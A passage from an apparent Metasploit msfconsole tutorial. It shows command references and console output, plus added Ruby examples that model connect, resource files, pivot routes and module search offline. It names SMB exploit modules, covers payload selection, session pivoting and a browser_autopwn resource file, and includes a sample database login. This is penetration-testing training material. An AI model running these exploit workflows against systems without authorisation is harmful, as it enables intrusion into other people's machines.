        get           Gets the value of a context-specific variable
        getg          Gets the value of a global variable
        grep          Grep the output of another command
        help          Help menu
        info          Displays information about one or more modules
        irb           Drop into irb scripting mode
        jobs          Displays and manages jobs
        kill          Kill a job
        load          Load a framework plugin
        loadpath      Searches for and loads modules from a path
        makerc        Save commands entered since start to a file
        options       Displays global options or for one or more modules
        popm          Pops the latest module off the stack and makes it active
        previous      Sets the previously loaded module as the current module
        pushm         Pushes the active or list of modules onto the module stack
        quit          Exit the console
        reload_all    Reloads all modules from all defined module paths
        rename_job    Rename a job
        resource      Run the commands stored in a file
        route         Route traffic through a session
        save          Saves the active datastores
        search        Searches module names and descriptions
        sessions      Dump session listings and display information about sessions
        set           Sets a context-specific variable to a value
        setg          Sets a global variable to a value
        show          Displays modules of a given type, or all modules
        sleep         Do nothing for the specified number of seconds
        spool         Write console output into a file as well the screen
        threads       View and manipulate background threads
        unload        Unload a framework plugin
        unset         Unsets one or more context-specific variables
        unsetg        Unsets one or more global variables
        use           Selects a module by name
        version       Show the framework and console library version numbers
    
    
    Database Backend Commands
    =========================
    
        Command           Description
        -------           -----------
        creds             List all credentials in the database
        db_connect        Connect to an existing database
        db_disconnect     Disconnect from the current database instance
        db_export         Export a file containing the contents of the database
        db_import         Import a scan result file (filetype will be auto-detected)
        db_nmap           Executes nmap and records the output automatically
        db_rebuild_cache  Rebuilds the database-stored module cache
        db_status         Show the current database status
        hosts             List all hosts in the database
        loot              List all loot in the database
        notes             List all notes in the database
        services          List all services in the database
        vulns             List all vulnerabilities in the database
        workspace         Switch between database workspaces
    
    

    e) Tab completion

    MSFconsole is designed to be fast to use, and one of the features that helps with this goal is tab completion. With the wide array of modules available, it can be difficult to remember the exact name and path of the particular module you want to use. As in most other shells, entering what you know and pressing Tab presents a list of the available options, or auto-completes the string if there is only one option. Tab completion depends on the ruby readline extension, and nearly every command in the console supports it.

    • use exploit/windows/dce
    • use .*netapi.*
    • set LHOST
    • show
    • set TARGET
    • set PAYLOAD windows/shell/
    • exp
    msf > use exploit/windows/smb/ms
    use exploit/windows/smb/ms03_049_netapi
    use exploit/windows/smb/ms04_007_killbill
    use exploit/windows/smb/ms04_011_lsass
    use exploit/windows/smb/ms04_031_netdde
    use exploit/windows/smb/ms05_039_pnp
    use exploit/windows/smb/ms06_025_rasmans_reg
    use exploit/windows/smb/ms06_025_rras
    use exploit/windows/smb/ms06_040_netapi
    use exploit/windows/smb/ms06_066_nwapi
    use exploit/windows/smb/ms06_066_nwwks
    use exploit/windows/smb/ms06_070_wkssvc
    use exploit/windows/smb/ms07_029_msdns_zonename
    use exploit/windows/smb/ms08_067_netapi
    use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
    use exploit/windows/smb/ms10_046_shortcut_icon_dllloader
    use exploit/windows/smb/ms10_061_spoolss
    use exploit/windows/smb/ms15_020_shortcut_icon_dllloader
    msf > use exploit/windows/smb/ms08_067_netapi
    

    MSFconsole is the most commonly used interface to Metasploit. Familiarizing yourself with these msfconsole commands will help you throughout this course and give you a solid foundation for working with Metasploit.

    f) MSFconsole commands

    MSFconsole has many different command options to choose from. The following is the core set of Metasploit commands, each with a sample of its output.

    back          Move back from the current context
    banner        Display an awesome metasploit banner
    cd            Change the current working directory
    color         Toggle color
    connect       Communicate with a host
    edit          Edit the current module with $VISUAL or $EDITOR
    exit          Exit the console
    get           Gets the value of a context-specific variable
    getg          Gets the value of a global variable
    go_pro        Launch Metasploit web GUI
    
    grep          Grep the output of another command
    help          Help menu
    info          Displays information about one or more module
    irb           Drop into irb scripting mode
    jobs          Displays and manages jobs
    kill          Kill a job
    load          Load a framework plugin
    loadpath      Searches for and loads modules from a path
    makerc        Save commands entered since start to a file
    popm          Pops the latest module off the stack and makes it active
    
    previous      Sets the previously loaded module as the current module
    pushm         Pushes the active or list of modules onto the module stack
    quit          Exit the console
    reload_all    Reloads all modules from all defined module paths
    rename_job    Rename a job
    resource      Run the commands stored in a file
    route         Route traffic through a session
    save          Saves the active datastores
    search        Searches module names and descriptions
    sessions      Dump session listings and display information about sessions
    
    set           Sets a context-specific variable to a value
    setg          Sets a global variable to a value
    show          Displays modules of a given type, or all modules
    sleep         Do nothing for the specified number of seconds
    spool         Write console output into a file as well the screen
    threads       View and manipulate background threads
    unload        Unload a framework plugin
    unset         Unsets one or more context-specific variables
    unsetg        Unsets one or more global variables
    use           Selects a module by name
    version       Show the framework and console library version numbers
    

    back command

    Once you have finished working with a particular module, or if you have inadvertently selected the wrong module, you can issue the back command to move out of the current context. This is not strictly required, however: just as on a commercial router, you can switch from one module to another without going back first. As a reminder, only variables that were set globally carry over between modules.

    msf auxiliary(ms09_001_write) > back
    msf >
    

    banner command

    Simply displays a randomly selected banner.

    msf > banner
     _                                                    _
    /     /         __                         _   __  /_/ __
    | |  / | _____               ___   _____ | | /   _    
    | | /| | | ___ |- -|   /    / __ | -__/ | || | || | |- -|
    |_|   | | | _|__  | |_  / - __    | |    | | __/| |  | |_
          |/  |____/  ___/ / \___/   /     __|    |_  ___
    
    Frustrated with proxy pivoting? Upgrade to layer-2 VPN pivoting with
    Metasploit Pro -- type 'go_pro' to launch it now.
    
           =[ metasploit v4.11.4-2015071402                  ]
    + -- --=[ 1467 exploits - 840 auxiliary - 232 post        ]
    + -- --=[ 432 payloads - 37 encoders - 8 nops             ]
    

    check command

    Not many exploits support it, but there is also a check option that tests whether a target is vulnerable to a particular exploit instead of actually exploiting it. When a module implements it, check is the safer first step against production systems, because a failed exploit attempt against a vulnerable service can crash it.

    msf exploit(ms08_067_netapi) > show options
    
    Module options (exploit/windows/smb/ms08_067_netapi):
    
       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       RHOST    172.16.194.134   yes       The target address
       RPORT    445              yes       Set the SMB service port
       SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Automatic Targeting
    
    msf exploit(ms08_067_netapi) > check
    
    [*] Verifying vulnerable status... (path: 0x0000005a)
    [*] System is not vulnerable (status: 0x00000000)
    [*] The target is not exploitable.
    msf  exploit(ms08_067_netapi) >
    

    color command

    You can enable or disable colored output from msfconsole.

    msf > color
    Usage: color <'true'|'false'|'auto'>
    
    Enable or disable color output.
    

    connect command

    A miniature Netcat clone is built into msfconsole, with support for SSL, proxies, pivoting and file transfers. By issuing the connect command with an IP address and port number, you can connect to a remote host from within msfconsole just as you would with Netcat or Telnet, and the connection is routed through any session pivots you have configured.

    msf > connect 192.168.1.1 23
    [*] Connected to 192.168.1.1:23
    DD-WRT v24 std (c) 2008 NewMedia-NET GmbH
    Release: 07/27/08 (SVN revision: 10011)
    DD-WRT login:
    

    You can see all the additional options by passing the -h argument.

    msf > connect -h
    Usage: connect [options] <host> <port>
    
    Communicate with a host, similar to interacting via netcat, taking advantage of
    any configured session pivoting.
    
    OPTIONS:
    
        -C        Try to use CRLF for EOL sequence.
        -P <opt>  Specify source port.
        -S <opt>  Specify source address.
        -c <opt>  Specify which Comm to use.
        -h        Help banner.
        -i <opt>  Send the contents of a file.
        -p <opt>  List of proxies to use.
        -s        Connect with SSL.
        -u        Switch to a UDP socket.
        -w <opt>  Specify connect timeout.
        -z        Just try to connect, then return.
    
    msf >
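    The behaviour of connect shown above, together with the -w (connect timeout), -z (connect only, then return) and -C (CRLF line endings) options from its help text, is reproduced in the following added Ruby example. It is not Metasploit's own connect implementation: it talks to a throwaway local service constructed inline that replays a DD-WRT style banner, so it runs offline. Function names are hypothetical.

```ruby
require 'socket'
require 'timeout'

# Added example, not Metasploit's own code: what "connect" does above,
# plus the -w (connect timeout), -z (connect only) and -C (CRLF line
# endings) behaviours, exercised against a throwaway local service so it
# runs offline. Function names are hypothetical.

# Constructed stand-in for the DD-WRT telnet banner captured above.
DDWRT_BANNER = "DD-WRT v24 std (c) 2008 NewMedia-NET GmbH\r\n" \
               "Release: 07/27/08 (SVN revision: 10011)\r\n" \
               "DD-WRT login: "

# Connect to host:port. Returns :open for a probe (-z), otherwise the
# bytes the peer sent back, after optionally sending one line first.
def connect_grab(host, port, timeout: 2.0, send_line: nil, crlf: false, probe_only: false)
  sock = Timeout.timeout(timeout) { TCPSocket.new(host, port) }   # -w
  return :open if probe_only                                      # -z
  sock.write(send_line + (crlf ? "\r\n" : "\n")) if send_line      # -C
  data = +''
  begin
    Timeout.timeout(timeout) { loop { data << sock.readpartial(4096) } }
  rescue EOFError, Errno::ECONNRESET, Timeout::Error
    # peer closed, reset, or went quiet: hand back what arrived
  end
  data
ensure
  sock&.close
end

# One-shot fake service on 127.0.0.1: sends the banner, echoes the first
# line it receives within `grace` seconds (so CRLF vs LF is observable),
# then closes. Returns [port, thread]; join the thread when done.
def start_fake_service(banner: DDWRT_BANNER, grace: 0.5)
  server = TCPServer.new('127.0.0.1', 0)
  port = server.addr[1]
  thread = Thread.new do
    begin
      client = server.accept
      client.write(banner)
      if IO.select([client], nil, nil, grace)
        line = client.gets
        client.write("got #{line.inspect}\n") if line
      end
      client.close
    rescue IOError, SystemCallError
      # a -z probe may close before we write; that is not an error here
    ensure
      server.close
    end
  end
  [port, thread]
end

if __FILE__ == $0
  port, thread = start_fake_service
  puts connect_grab('127.0.0.1', port, send_line: 'admin', crlf: true)
  thread.join
end
```

    The timeout wraps both the TCP connect and the read, which is what keeps a banner grab against a silent filtered port from hanging the console; the echo from the fake service makes it visible whether the line went out terminated with CRLF (what a telnet daemon expects) or a bare LF.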
    

    edit command

    The edit command opens the current module in $VISUAL or $EDITOR. By default this opens the module in Vim.

    msf exploit(ms10_061_spoolss) > edit
    [*] Launching /usr/bin/vim /usr/share/metasploit-framework/modules/exploits/windows/smb/ms10_061_spoolss.rb
    
    ##
    # This module requires Metasploit: http://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    require 'msf/core'
    require 'msf/windows_error'
    
    class Metasploit3 < Msf::Exploit::Remote
      Rank = ExcellentRanking
    
      include Msf::Exploit::Remote::DCERPC
      include Msf::Exploit::Remote::SMB
      include Msf::Exploit::EXE
      include Msf::Exploit::WbemExec
    
      def initialize(info = {})
    

    exit command

    The exit command simply exits msfconsole.

    msf exploit(ms10_061_spoolss) > exit
    root@kali:~#
    

    grep command

    The grep command is similar to Linux grep: it matches a given pattern against the output of another msfconsole command. The following example uses grep to keep only the lines containing the string "http" from a search for modules containing the string "oracle".

    msf > grep
    Usage: grep [options] pattern cmd
    
    Grep the results of a console command (similar to Linux grep command)
    
    OPTIONS:
    
        -A <opt>  Show arg lines of output After a match.
        -B <opt>  Show arg lines of output Before a match.
        -c        Only print a count of matching lines.
        -h        Help banner.
        -i        Ignore case.
        -k <opt>  Keep (include) arg lines at start of output.
        -m <opt>  Stop after arg matches.
        -s <opt>  Skip arg lines of output before attempting match.
        -v        Invert match.
    msf >
    msf > grep http search oracle
       auxiliary/scanner/http/oracle_demantra_database_credentials_leak      2014-02-28       normal     Oracle Demantra Database Credentials Leak
       auxiliary/scanner/http/oracle_demantra_file_retrieval                 2014-02-28       normal     Oracle Demantra Arbitrary File Retrieval with Authentication Bypass
       auxiliary/scanner/http/oracle_ilom_login                                               normal     Oracle ILO Manager Login Brute Force Utility
       exploit/multi/http/glassfish_deployer                                 2011-08-04       excellent  Sun/Oracle GlassFish Server Authenticated Code Execution
       exploit/multi/http/oracle_ats_file_upload                             2016-01-20       excellent  Oracle ATS Arbitrary File Upload
       exploit/multi/http/oracle_reports_rce                                 2014-01-15       great      Oracle Forms and Reports Remote Code Execution
       exploit/windows/http/apache_chunked                                   2002-06-19       good       Apache Win32 Chunked Encoding
       exploit/windows/http/bea_weblogic_post_bof                            2008-07-17       great      Oracle Weblogic Apache Connector POST Request Buffer Overflow
       exploit/windows/http/oracle9i_xdb_pass                                2003-08-18       great      Oracle 9i XDB HTTP PASS Overflow (win32)
       exploit/windows/http/oracle_beehive_evaluation                        2010-06-09       excellent  Oracle BeeHive 2 voice-servlet processEvaluation() Vulnerability
       exploit/windows/http/oracle_beehive_prepareaudiotoplay                2015-11-10       excellent  Oracle BeeHive 2 voice-servlet prepareAudioToPlay() Arbitrary File Upload
       exploit/windows/http/oracle_btm_writetofile                           2012-08-07       excellent  Oracle Business Transaction Management FlashTunnelService Remote Code Execution
       exploit/windows/http/oracle_endeca_exec                               2013-07-16       excellent  Oracle Endeca Server Remote Command Execution
       exploit/windows/http/oracle_event_processing_upload                   2014-04-21       excellent  Oracle Event Processing FileUploadServlet Arbitrary File Upload
       exploit/windows/http/osb_uname_jlist                                  2010-07-13       excellent  Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability
    

    help command

    The help command gives you a list of all available commands together with a short description of each.

    msf > help
    
    Core Commands
    =============
    
        Command       Description
        -------       -----------
        ?             Help menu
        banner        Display an awesome metasploit banner
        cd            Change the current working directory
        color         Toggle color
        connect       Communicate with a host
    ...snip...
    
    Database Backend Commands
    =========================
    
        Command           Description
        -------           -----------
        db_connect        Connect to an existing database
        db_disconnect     Disconnect from the current database instance
        db_export         Export a file containing the contents of the database
        db_import         Import a scan result file (filetype will be auto-detected)
    ...snip...
    

    info command

    The info command provides detailed information about a particular module, including all of its options, targets and other information. Be sure to always read a module's description before using it, as some can have undesirable side effects.

    The info command also provides the following information:

    • Author and licensing information
    • Vulnerability references (i.e. CVE, BID, etc.)
    • Any payload restrictions the module may have

    msf  exploit(ms09_050_smb2_negotiate_func_index) > info exploit/windows/smb/ms09_050_smb2_negotiate_func_index 
    
           Name: Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
         Module: exploit/windows/smb/ms09_050_smb2_negotiate_func_index
        Version: 14774
       Platform: Windows
     Privileged: Yes
        License: Metasploit Framework License (BSD)
           Rank: Good
    
    Provided by:
      Laurent Gaffie <laurent.gaffie@gmail.com>
      hdm <hdm@metasploit.com>
      sf <stephen_fewer@harmonysecurity.com>
    
    Available targets:
      Id  Name
      --  ----
      0   Windows Vista SP1/SP2 and Server 2008 (x86)
    
    Basic options:
      Name   Current Setting  Required  Description
      ----   ---------------  --------  -----------
      RHOST                   yes       The target address
      RPORT  445              yes       The target port
      WAIT   180              yes       The number of seconds to wait for the attack to complete.
    
    Payload information:
      Space: 1024
    
    Description:
      This module exploits an out of bounds function table dereference in 
      the SMB request validation code of the SRV2.SYS driver included with 
      Windows Vista, Windows 7 release candidates (not RTM), and Windows 
      2008 Server prior to R2. Windows Vista without SP1 does not seem 
      affected by this flaw.
    
    References:
      http://www.microsoft.com/technet/security/bulletin/MS09-050.mspx
      http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-3103
      http://www.securityfocus.com/bid/36299
      http://www.osvdb.org/57799
      http://seclists.org/fulldisclosure/2009/Sep/0039.html
      http://www.microsoft.com/technet/security/Bulletin/MS09-050.mspx
    
    msf  exploit(ms09_050_smb2_negotiate_func_index) >
    

    irb command

    Running the irb command drops you into a live Ruby interpreter shell where you can issue commands and create Metasploit scripts on the fly. This feature is also very useful for understanding the internals of the framework.

    msf > irb
    [*] Starting IRB shell...
    
    >> puts "Hello, metasploit!"
    Hello, metasploit!
    => nil
    >> Framework::Version
    => "4.8.2-2014022601"
    

    jobs command

    Jobs are modules that are running in the background. The jobs command provides the ability to list and terminate these jobs.

    msf > jobs -h
    Usage: jobs [options]
    
    Active job manipulation and interaction.
    
    OPTIONS:
    
        -K        Terminate all running jobs.
        -h        Help banner.
        -i   Lists detailed information about a running job.
        -k   Terminate the specified job name.
        -l        List all running jobs.
        -v        Print more detailed info.  Use with -i and -l
    
    msf >
    

    kill command

    The kill command terminates any running job when supplied with the job ID.

    msf exploit(ms10_002_aurora) > kill 0
    Stopping job: 0...
    
    [*] Server stopped.
    

    load command

    The load command loads a plugin from Metasploit's plugin directory. Arguments are passed as key=val on the shell.

    msf > load
    Usage: load  [var=val var=val ...]
    
    Loads a plugin from the supplied path.  If path is not absolute, first looks
    in the user's plugin directory (/root/.msf4/plugins) then
    in the framework root plugin directory (/usr/share/metasploit-framework/plugins).
    The optional var=val options are custom parameters that can be passed to plugins.
    
    msf > load pcap_log
    [*] PcapLog plugin loaded.
    [*] Successfully loaded plugin: pcap_log
    

    loadpath command

    The loadpath command loads a third-party module tree from the given path, so you can point Metasploit at your own 0-day exploits, encoders, payloads, etc.

    msf > loadpath /home/secret/modules
    
    Loaded 0 modules.
    

    unload command

    Conversely, the unload command unloads a previously loaded plugin and removes any extended commands it added.

    msf > unload pcap_log
    Unloading plugin pcap_log...unloaded.
    

    resource command

    The resource command runs resource (batch) files that can be loaded through msfconsole.

    msf > resource
    Usage: resource path1 [path2 ...]
    
    Run the commands stored in the supplied files.  Resource files may also contain
    ruby code between  tags.
    
    See also: makerc
    

    Some attacks, such as Karmetasploit, use resource files to run a set of commands from a karma.rc file to set up the attack. Later, we will discuss how this is very useful outside of Karmetasploit as well.

    msf > resource karma.rc
    [*] Processing karma.rc for ERB directives.
    resource (karma.rc_.txt)> db_connect postgres:toor@127.0.0.1/msfbook
    resource (karma.rc_.txt)> use auxiliary/server/browser_autopwn
    ...snip...
    

    Batch files can greatly speed up testing and development time and allow users to automate many tasks. Besides loading a batch file from within msfconsole, one can also be passed at startup using the -r flag. The simple example below creates a batch file that displays the Metasploit version number at startup.

    root@kali:~# echo version > version.rc
    root@kali:~# msfconsole -r version.rc
    
     _                                                    _
    /     /         __                         _   __  /_/ __
    | |  / | _____               ___   _____ | | /   _    
    | | /| | | ___ |- -|   /    / __ | -__/ | || | || | |- -|
    |_|   | | | _|__  | |_  / - __    | |    | | __/| |  | |_
          |/  |____/  ___/ / \___/   /     __|    |_  ___
    
    Frustrated with proxy pivoting? Upgrade to layer-2 VPN pivoting with
    Metasploit Pro -- type 'go_pro' to launch it now.
    
           =[ metasploit v4.8.2-2014021901 [core:4.8 api:1.0] ]
    + -- --=[ 1265 exploits - 695 auxiliary - 202 post ]
    + -- --=[ 330 payloads - 32 encoders - 8 nops      ]
    
    [*] Processing version.rc for ERB directives.
    resource (version.rc)> version
    Framework: 4.8.2-2014022601
    Console  : 4.8.2-2014022601.15168
    msf >
    
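    To make the "Processing version.rc for ERB directives" step concrete, here is an added example in Ruby (msfconsole's own language) that is not Metasploit's code: it renders a constructed resource file with Ruby's standard ERB library, returns the list of commands the console would run, writes a one-line file the way `echo version > version.rc` does, and flags the lines that change globals so they can be reviewed before a shared rc file is run. The module `auxiliary/scanner/mysql/mysql_version` and the variable names are taken from elsewhere on this page; the file contents are constructed.

```ruby
require 'erb'
require 'tmpdir'

# Constructed resource file (not from the page). One command per line;
# blank lines and '#' comments are skipped, and ERB directives are
# expanded before any command runs, which is what the
# "Processing ... for ERB directives" message refers to.
SAMPLE_RC = <<~RC
  # scan settings are rendered from Ruby variables at load time
  setg LHOST <%= lhost %>
  use auxiliary/scanner/mysql/mysql_version

  set RHOSTS <%= rhosts %>
  set THREADS <%= threads %>
  run
  version
RC

# Expand the ERB directives and return the commands in execution order.
# The keyword arguments become local variables visible to ERB via binding.
def render_resource(text, lhost:, rhosts:, threads:)
  rendered = ERB.new(text).result(binding)
  rendered.lines.map(&:strip).reject { |l| l.empty? || l.start_with?('#') }
end

# Write a resource file, one command per line, like `echo version > version.rc`.
def write_resource(path, commands)
  File.write(path, commands.join("\n") + "\n")
  path
end

# Commands that modify the global datastore. A setg persists across modules
# (and across restarts once saved), so these lines deserve a look before an
# rc file written by someone else is loaded.
def global_changes(commands)
  commands.select { |c| c.start_with?('setg ', 'unsetg ') }
end

if $PROGRAM_NAME == __FILE__
  cmds = render_resource(SAMPLE_RC, lhost: '192.168.1.101',
                                    rhosts: '192.168.1.0/24', threads: 50)
  puts cmds
  puts "globals touched: #{global_changes(cmds).inspect}"
  path = write_resource(File.join(Dir.tmpdir, 'version.rc'), ['version'])
  puts "wrote #{path}: #{File.read(path).inspect}"
end
```

    The rendered list is exactly what `msfconsole -r` would feed to the console line by line; the ERB expansion happens once, before the first command runs, so a variable that is undefined at render time fails the whole file rather than a single command.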

    route command

    The route command in Metasploit lets you route sockets through a session, or "comm", which provides basic pivoting capability. To add a route, pass the target subnet and network mask followed by the session (comm) number.

    meterpreter > route -h
    Route traffic destined to a given subnet through a supplied session.
    
    Usage:
      route [add/remove] subnet netmask [comm/sid]
      route [add/remove] cidr [comm/sid]
      route [get] 
      route [flush]
      route [print]
    
    Subcommands:
      add - make a new route
      remove - delete a route; 'del' is an alias
      flush - remove all routes
      get - display the route for a given target
      print - show all active routes
    
    Examples:
      Add a route for all hosts from 192.168.0.0 to 192.168.0.0 through session 1
        route add 192.168.0.0 255.255.255.0 1
        route add 192.168.0.0/24 1
    
      Delete the above route
        route remove 192.168.0.0/24 1
        route del 192.168.0.0 255.255.255.0 1
    
      Display the route that would be used for the given host or network
        route get 192.168.0.11
    
    meterpreter >
    
    meterpreter > route
    
    Network routes
    ==============
    
        Subnet           Netmask          Gateway
        ------           -------          -------
        0.0.0.0          0.0.0.0          172.16.1.254
        127.0.0.0        255.0.0.0        127.0.0.1
        172.16.1.0       255.255.255.0    172.16.1.100
        172.16.1.100     255.255.255.255  127.0.0.1
        172.16.255.255   255.255.255.255  172.16.1.100
        224.0.0.0        240.0.0.0        172.16.1.100
        255.255.255.255  255.255.255.255  172.16.1.100
    
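    The route table above is easier to reason about with a model of how a target address is mapped to a session. This is an added Ruby example, not Metasploit's routing code: it accepts both the subnet/netmask and the CIDR forms shown in the help text, supports add, remove, get, flush and a listing, and assumes that when several routes cover a target the most specific one (longest prefix) wins. The addresses in the usage section are constructed.

```ruby
require 'ipaddr'

# Minimal pivot route table modelled on `route add/remove/get/flush/print`.
class PivotRoutes
  Route = Struct.new(:network, :session) do
    def to_s
      "#{network}/#{network.prefix} via session #{session}"
    end
  end

  def initialize
    @routes = []
  end

  # add('192.168.0.0', '255.255.255.0', 1) or add('192.168.0.0/24', 1)
  def add(subnet, mask_or_session, session = nil)
    net, sid = parse(subnet, mask_or_session, session)
    return false if find(net, sid)          # duplicate route, nothing to do
    @routes << Route.new(net, sid)
    true
  end

  # Same argument forms as add; returns false when no such route exists.
  def remove(subnet, mask_or_session, session = nil)
    net, sid = parse(subnet, mask_or_session, session)
    route = find(net, sid)
    return false unless route
    @routes.delete(route)
    true
  end

  def flush
    @routes.clear
    nil
  end

  # Like `route get`: the most specific route covering the target, or nil
  # when the target would not be pivoted at all.
  def get(target)
    ip = IPAddr.new(target)
    @routes.select { |r| r.network.include?(ip) }
           .max_by { |r| r.network.prefix }
  end

  # Like `route print`.
  def list
    @routes.map(&:to_s)
  end

  private

  # Normalise both input forms to an IPAddr network plus an integer session id.
  def parse(subnet, mask_or_session, session)
    if session.nil?
      [IPAddr.new(subnet), Integer(mask_or_session)]
    else
      [IPAddr.new(subnet).mask(mask_or_session), Integer(session)]
    end
  end

  # IPAddr#== ignores the prefix length, so compare it explicitly.
  def find(net, sid)
    @routes.find do |r|
      r.network == net && r.network.prefix == net.prefix && r.session == sid
    end
  end
end

if $PROGRAM_NAME == __FILE__
  rt = PivotRoutes.new
  rt.add('192.168.0.0', '255.255.255.0', 1)   # netmask form
  rt.add('10.0.0.0/8', 1)                      # CIDR form
  rt.add('10.1.0.0/16', 2)                     # more specific, different session
  puts rt.list
  puts "10.1.2.3   -> #{rt.get('10.1.2.3')}"   # session 2 (longest prefix)
  puts "10.9.9.9   -> #{rt.get('10.9.9.9')}"   # session 1
  puts "8.8.8.8    -> #{rt.get('8.8.8.8').inspect}"  # nil, not pivoted
end
```

    The explicit prefix comparison in find matters: Ruby's IPAddr treats 10.0.0.0/8 and 10.0.0.0/16 as equal, so without it a remove of one would silently delete the other.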

    search command

    msfconsole includes an extensive regular-expression-based search function. If you have a general idea of what you are looking for, you can search for it with search. In the output below, a search is being made for the MS bulletin MS09-011. The search function will locate this string within module names, descriptions, references, etc.

    Note that the naming convention for Metasploit modules uses underscores rather than hyphens.

    msf > search usermap_script
    
    Matching Modules
    ================
    
       Name                                Disclosure Date  Rank       Description
       ----                                ---------------  ----       -----------
       exploit/multi/samba/usermap_script  2007-05-14       excellent  Samba "username map script" Command Execution
    
    msf >
    

    help search

    You can further refine your searches by using the built-in keyword system.

    msf > help search
    Usage: search [keywords]
    
    Keywords:
      app       :  Modules that are client or server attacks
      author    :  Modules written by this author
      bid       :  Modules with a matching Bugtraq ID
      cve       :  Modules with a matching CVE ID
      edb       :  Modules with a matching Exploit-DB ID
      name      :  Modules with a matching descriptive name
      platform  :  Modules affecting this platform
      ref       :  Modules with a matching ref
      type      :  Modules of a specific type (exploit, auxiliary, or post)
    
    Examples:
      search cve:2009 type:exploit app:client
    
    msf >
    

    name keyword

    To search using a descriptive name, use the name keyword.

    msf > search name:mysql
    
    Matching Modules
    ================
    
       Name                                               Disclosure Date  Rank       Description
       ----                                               ---------------  ----       -----------
       auxiliary/admin/mysql/mysql_enum                                    normal     MySQL Enumeration Module
       auxiliary/admin/mysql/mysql_sql                                     normal     MySQL SQL Generic Query
       auxiliary/analyze/jtr_mysql_fast                                    normal     John the Ripper MySQL Password Cracker (Fast Mode)
       auxiliary/scanner/mysql/mysql_authbypass_hashdump  2012-06-09       normal     MySQL Authentication Bypass Password Dump
       auxiliary/scanner/mysql/mysql_hashdump                              normal     MYSQL Password Hashdump
       auxiliary/scanner/mysql/mysql_login                                 normal     MySQL Login Utility
       auxiliary/scanner/mysql/mysql_schemadump                            normal     MYSQL Schema Dump
       auxiliary/scanner/mysql/mysql_version                               normal     MySQL Server Version Enumeration
       exploit/linux/mysql/mysql_yassl_getname            2010-01-25       good       MySQL yaSSL CertDecoder::GetName Buffer Overflow
       exploit/linux/mysql/mysql_yassl_hello              2008-01-04       good       MySQL yaSSL SSL Hello Message Buffer Overflow
       exploit/windows/mysql/mysql_payload                2009-01-16       excellent  Oracle MySQL for Microsoft Windows Payload Execution
       exploit/windows/mysql/mysql_yassl_hello            2008-01-04       average    MySQL yaSSL SSL Hello Message Buffer Overflow
    msf >
    

    platform keyword

    You can use platform to narrow down your search to modules that affect a specific platform.

    msf > search platform:aix
    
    Matching Modules
    ================
    
       Name                                  Disclosure Date  Rank    Description
       ----                                  ---------------  ----    -----------
       payload/aix/ppc/shell_bind_tcp                         normal  AIX Command Shell, Bind TCP Inline
       payload/aix/ppc/shell_find_port                        normal  AIX Command Shell, Find Port Inline
       payload/aix/ppc/shell_interact                         normal  AIX execve shell for inetd
    ...snip...
    

    type keyword

    Using type lets you filter by module type, such as auxiliary, post, exploit, etc.

    msf > search type:post
    
    Matching Modules
    ================
    
       Name                                                Disclosure Date  Rank    Description
       ----                                                ---------------  ----    -----------
       post/linux/gather/checkvm                                            normal  Linux Gather Virtual Environment Detection
       post/linux/gather/enum_cron                                          normal  Linux Cron Job Enumeration
       post/linux/gather/enum_linux                                         normal  Linux Gather System Information
    ...snip...
    

    author keyword

    Searching with the author keyword lets you look up modules by your favourite author.

    msf > search author:dookie
    
    Matching Modules
    ================
    
       Name                                                       Disclosure Date  Rank     Description
       ----                                                       ---------------  ----     -----------
       exploit/osx/http/evocam_webserver                          2010-06-01       average  MacOS X EvoCam HTTP GET Buffer Overflow
       exploit/osx/misc/ufo_ai                                    2009-10-28       average  UFO: Alien Invasion IRC Client Buffer Overflow Exploit
       exploit/windows/browser/amaya_bdo                          2009-01-28       normal   Amaya Browser v11.0 bdo tag overflow
    ...snip...
    

    Combining multiple keywords

    You can also combine multiple keywords to narrow down the returned results further.

    msf > search cve:2011 author:jduck platform:linux
    
    Matching Modules
    ================
    
       Name                                         Disclosure Date  Rank     Description
       ----                                         ---------------  ----     -----------
       exploit/linux/misc/netsupport_manager_agent  2011-01-08       average  NetSupport Manager Agent Remote Buffer Overflow
    
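    The keyword filters above (name, platform, type, author, cve, bid, edb, ref) and the plain regex terms combine with AND semantics, which is easiest to see by reimplementing the matching over a handful of module records. This is an added Ruby example, not Metasploit's search code: the module list is constructed (the module names, the MS09-050 references and the author list are taken from elsewhere on this page; ids written as XXXX are placeholders), and the exact field each keyword is matched against is this example's assumption.

```ruby
# Constructed module metadata, loosely shaped like the fields `info` prints.
# Reference ids containing XXXX are placeholders, not real identifiers.
MODULES = [
  { name: 'exploit/linux/misc/netsupport_manager_agent', type: 'exploit',
    platform: 'linux', authors: ['jduck'], refs: ['CVE-2011-XXXX'],
    desc: 'NetSupport Manager Agent Remote Buffer Overflow' },
  { name: 'exploit/multi/samba/usermap_script', type: 'exploit',
    platform: 'unix', authors: ['jduck'], refs: ['CVE-2007-XXXX', 'BID-XXXXX'],
    desc: 'Samba "username map script" Command Execution' },
  { name: 'exploit/windows/smb/ms09_050_smb2_negotiate_func_index', type: 'exploit',
    platform: 'windows', authors: ['Laurent Gaffie', 'hdm', 'sf'],
    refs: ['CVE-2009-3103', 'BID-36299', 'MSB-MS09-050'],
    desc: 'Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference' },
  { name: 'auxiliary/scanner/mysql/mysql_login', type: 'auxiliary',
    platform: 'multi', authors: ['example-author'], refs: [],
    desc: 'MySQL Login Utility' },
  { name: 'post/linux/gather/checkvm', type: 'post',
    platform: 'linux', authors: ['example-author'], refs: [],
    desc: 'Linux Gather Virtual Environment Detection' },
].freeze

KEYWORDS = %w[author bid cve edb name platform ref type].freeze

# Split "cve:2011 author:jduck foo" into [[key, value], ...] and plain terms.
# Anything that is not a known keyword stays a plain search term.
def parse_query(query)
  filters = []
  terms = []
  query.split.each do |tok|
    key, value = tok.split(':', 2)
    if value && KEYWORDS.include?(key)
      filters << [key, value.downcase]
    else
      terms << tok
    end
  end
  [filters, terms]
end

# cve:2011 matches any reference of the form CVE-...2011...
def ref_match?(mod, prefix, value)
  mod[:refs].any? do |ref|
    r = ref.downcase
    r.start_with?("#{prefix}-") && r.include?(value)
  end
end

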